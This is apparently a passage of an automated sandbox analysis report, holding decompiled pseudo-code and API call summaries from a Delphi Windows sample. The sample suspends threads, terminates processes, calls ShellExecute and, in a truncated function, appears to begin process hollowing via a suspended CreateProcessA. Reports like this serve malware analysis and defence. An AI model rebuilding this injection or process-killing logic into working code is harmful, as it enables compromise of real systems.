				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








    0x00404d8c
    0x00404d92
    0x00404da2
    0x00404dab
    0x00404db0
    0x00404db2
    0x00404db7
    0x00404dbc
    0x00404dbc
    0x00404db7
    0x00404dca

    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00403B18, Relevance: .0, Instructions: 37
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00402670, Relevance: .0, Instructions: 14
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
				void* _t3;
				void* _t6;

				if(__eax <= 0) {
					_t6 = 0;
				} else {
					_t3 =  *0x41903c(); // executed
					_t6 = _t3;
					if(_t6 == 0) {
						E00402778(1);
					}
				}
				return _t6;
			}





    0x00402673
    0x0040268a
    0x00402675
    0x00402675
    0x0040267b
    0x0040267f
    0x00402683
    0x00402683
    0x0040267f
    0x0040268f

    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00403B78, Relevance: .0, Instructions: 12
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
				void* _t6;
				intOrPtr _t7;

				_t7 = __edx;
				 *0x454014 = 0x4011a8;
				 *0x454018 = 0x4011b0;
				 *0x454638 = __eax;
				 *0x45463c = 0;
				 *0x454640 = __edx;
				_t1 = _t7 + 4; // 0x400000
				 *0x45402c =  *_t1;
				E00403A70();
				 *0x454034 = 0; // executed
				_t6 = E00403B18(); // executed
				return _t6;
			}





    0x00403b78
    0x00403b78
    0x00403b82
    0x00403b8c
    0x00403b93
    0x00403b98
    0x00403b9e
    0x00403ba1
    0x00403ba6
    0x00403bab
    0x00403bb2
    0x00403bb7

    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 00417F5C, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 236
    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				CONTEXT* _v16;
				void* _v20;
				void _v24;
				void _v28;
				long _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOA _v116;
				CHAR* _t95;
				short* _t171;
				intOrPtr _t182;
				intOrPtr _t189;
				intOrPtr* _t194;
				short* _t196;
				void* _t197;
				void* _t199;
				void* _t200;
				intOrPtr _t201;
				void* _t215;

				_t215 = __fp0;
				_t199 = _t200;
				_t201 = _t200 + 0xffffff90;
				_t196 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t199);
				_push(0x418218);
				_push( *[fs:eax]);
				 *[fs:eax] = _t201;
				if(_v12 != 0) {
					_push(0x418230);
					_push(_v8);
					_push(0x41823c);
					_push(_v12);
					E00404208();
				}
				 *_a4 = 0;
				_t171 = _t196;
				if( *_t171 == 0x5a4d) {
					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
					if( *_t194 == 0x4550) {
						E00402B60( &_v116, 0x44);
						E00402B60( &_v48, 0x10);
						_v116.cb = 0x44;
						_v116.dwFlags = 1;
						_v116.wShowWindow = 0;
						_t95 = E00404348(_v12);
						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
							 *_a4 = _v48.dwProcessId;
							_v16 = E00417F28( &_v20);
							if(_v16 != 0) {
								_v16->ContextFlags = 0x10007;
